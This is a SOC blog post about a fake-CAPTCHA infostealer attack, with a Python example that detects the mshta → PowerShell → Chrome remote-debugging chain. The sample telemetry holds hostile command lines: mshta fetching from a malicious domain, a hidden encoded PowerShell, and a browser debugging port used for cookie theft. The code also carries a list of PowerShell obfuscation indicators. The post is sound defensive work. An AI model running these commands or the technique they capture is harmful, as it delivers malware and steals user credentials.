Launching #DetectionsFromTheSOC
We're excited to announce our new series, Detections from the SOC, in which we share a behind-the-scenes look at how our SOC detects, investigates, and responds to real-world threats.
Case #1: Infostealer via fake CAPTCHA
We intercepted an attack where the intruder didn't break in, but logged in. The entry point? A fake "I'm not a robot" CAPTCHA prompt.
Want to read the full story? Head on over to our LinkedIn to check it out: https://www.linkedin.com/feed/update/urn:li:activity:7336321179005165568
#detectionsfromthesoc #captcha #infostealer #cryptbot #soc #bec | Hunt & Hackett
For our first edition: infostealer deployed via fake CAPTCHA

In the middle of the night, Hunt & Hackett's 24/7 SOC intercepted the early stages of a broader cyberattack. The attacker didn't break in, but logged in. An endpoint was compromised using a fake #CAPTCHA page, one of those "I'm not a robot" checks. Only this one tricked the user into opening the Run dialog with Win + R and executing a command pasted from the page. That command launched a hidden process and deployed a known #infostealer, likely #Cryptbot.

What happened?
Our SOC flagged a suspicious mshta.exe process making an outbound connection to a previously unknown domain. This quickly escalated:
- The user was tricked into copy-pasting a command that silently launched mshta.exe
- mshta.exe spawned PowerShell, which contacted additional anomalous domains and executed fileless malware
- PowerShell launched Chrome/Edge with the --remote-debugging-port=9203 flag, a known technique for pulling cookies and saved credentials out of the browser through its DevTools interface
- The process accessed files in the Downloads folder
All signs pointed to credential theft and system reconnaissance.

How we detected it:
Our behavioural detection rules flagged:
- Use of mshta.exe in user context reaching unknown domains
- Obfuscated PowerShell activity
- Abuse of --remote-debugging-port in Chrome, a known credential-stealing tactic
Each of these on its own is noisy; together on one process chain they triggered a high-confidence detection, prompting an alert at our #SOC and enabling a fast response and remediation, even at 3AM.
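To make the "combination" point concrete, here is an added example, written for this page and not Hunt & Hackett's own rule set, of the three behaviours above evaluated over a handful of Sysmon-style process and network events and correlated along the parent/child chain. The events, pids, command lines, the host allowlist, the indicator thresholds and the encoded PowerShell payload are all constructed for the example; only the behaviours and the afliam.shop domain come from the post.

```python
import base64
import binascii
import json
import re
from collections import defaultdict

# Constructed sample telemetry, not real logs. Field names loosely follow
# Sysmon Event ID 1 (process create) and Event ID 3 (network connect); pids,
# ppids and command lines are assumptions made for this example. The base64
# blob is UTF-16LE for "IEX (New-Object", the encoding -EncodedCommand expects.
EVENTS = [
    {"type": "process", "pid": 1001, "ppid": 500, "user": r"CORP\jdoe",
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process", "pid": 1002, "ppid": 1001, "user": r"CORP\jdoe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://afliam.shop"},
    {"type": "network", "pid": 1002, "dest_host": "afliam.shop", "dest_port": 443},
    {"type": "process", "pid": 1003, "ppid": 1002, "user": r"CORP\jdoe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass "
                "-enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"type": "process", "pid": 1004, "ppid": 1003, "user": r"CORP\jdoe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe --remote-debugging-port=9203"},
    # Benign control: an admin running a script the normal way; nothing should fire.
    {"type": "process", "pid": 2001, "ppid": 500, "user": r"CORP\admin",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

KNOWN_GOOD_HOSTS = {"update.microsoft.com"}  # constructed allowlist of expected destinations
PS_INDICATORS = ("-w hidden", "-nop", "-ep bypass", "iex",
                 "invoke-expression", "downloadstring", "frombase64string")
RULE_NAMES = ("mshta_unknown_domain", "obfuscated_powershell", "browser_remote_debugging")


def is_user_context(user):
    """Interactive user rather than a system/service account (assumed naming)."""
    return not user.upper().startswith("NT AUTHORITY\\")


def decode_encoded_command(cmdline):
    """Return the plaintext of a -enc/-ec/-EncodedCommand payload, or None."""
    m = re.search(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def rule_mshta_unknown_domain(ev, net_by_pid):
    """mshta.exe in an interactive user's context talking to a host outside the allowlist."""
    if not ev["image"].lower().endswith("\\mshta.exe") or not is_user_context(ev["user"]):
        return False
    return any(n["dest_host"].lower() not in KNOWN_GOOD_HOSTS
               for n in net_by_pid.get(ev["pid"], []))


def rule_obfuscated_powershell(ev):
    """PowerShell showing at least two hiding/obfuscation indicators; the decoded -enc payload counts."""
    if "powershell" not in ev["image"].lower():
        return False
    text = ev["cmdline"].lower()
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded:
        text += " " + decoded.lower()
    return sum(tok in text for tok in PS_INDICATORS) >= 2


def rule_browser_remote_debugging(ev):
    """Chrome/Edge started with a DevTools remote-debugging port, the cookie/credential theft primitive."""
    image = ev["image"].lower()
    if not image.endswith(("\\chrome.exe", "\\msedge.exe")):
        return False
    return "--remote-debugging-port" in ev["cmdline"].lower()


def evaluate(events):
    """Run each rule per process; returns {pid: set of rule names that fired}."""
    net_by_pid = defaultdict(list)
    for ev in events:
        if ev["type"] == "network":
            net_by_pid[ev["pid"]].append(ev)
    hits = {}
    for ev in events:
        if ev["type"] != "process":
            continue
        fired = set()
        if rule_mshta_unknown_domain(ev, net_by_pid):
            fired.add("mshta_unknown_domain")
        if rule_obfuscated_powershell(ev):
            fired.add("obfuscated_powershell")
        if rule_browser_remote_debugging(ev):
            fired.add("browser_remote_debugging")
        if fired:
            hits[ev["pid"]] = fired
    return hits


def correlate(events, hits):
    """Walk each flagged leaf process up its ancestry and grade the chain by how many
    of the three behaviours it shows; all three together is the high-confidence case."""
    by_pid = {ev["pid"]: ev for ev in events if ev["type"] == "process"}
    hit_parents = {by_pid[p]["ppid"] for p in hits}
    alerts = []
    for pid in sorted(hits):
        if pid in hit_parents:  # report once, from the deepest flagged process
            continue
        chain, rules, cur = [], set(), pid
        while cur in by_pid:
            chain.append(cur)
            rules |= hits.get(cur, set())
            cur = by_pid[cur]["ppid"]
        chain.reverse()
        while chain and chain[0] not in hits:  # drop unflagged ancestors such as explorer.exe
            chain.pop(0)
        severity = {3: "high", 2: "medium"}.get(len(rules), "low")
        alerts.append({"severity": severity, "user": by_pid[pid]["user"],
                       "chain": chain, "rules": sorted(rules)})
    return alerts


if __name__ == "__main__":
    print(json.dumps(correlate(EVENTS, evaluate(EVENTS)), indent=2))
```

Run as-is it prints a single high-severity alert for the chain mshta.exe (1002) → powershell.exe (1003) → chrome.exe (1004) under CORP\jdoe, while the admin's plain PowerShell invocation fires nothing. The grading step is the part worth copying: any one of these rules alone would page an analyst far too often, so the alert is raised from the leaf process and scored on how many distinct behaviours the ancestry shows.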
Remediation:
- Clean install of the endpoint
- Blocked malicious domains
- Revoked all sessions and reset credentials
Resetting passwords alone would not have been enough here: session cookies stolen from the browser stay valid until the sessions they belong to are revoked.

This case shows how infostealers can be the first step in modern attacks, giving threat actors access to credentials, browser sessions, and local files. From there, they can move laterally, escalate privileges, and pave the way for bigger attacks like ransomware or business email compromise (#BEC) without you knowing it. In short: infostealers are a launchpad for full-scale breaches.

IOCs:
- hxxps[:]//afliam[.]shop
- b[.]watchcollision[.]xyz
- blisspicks[.]shop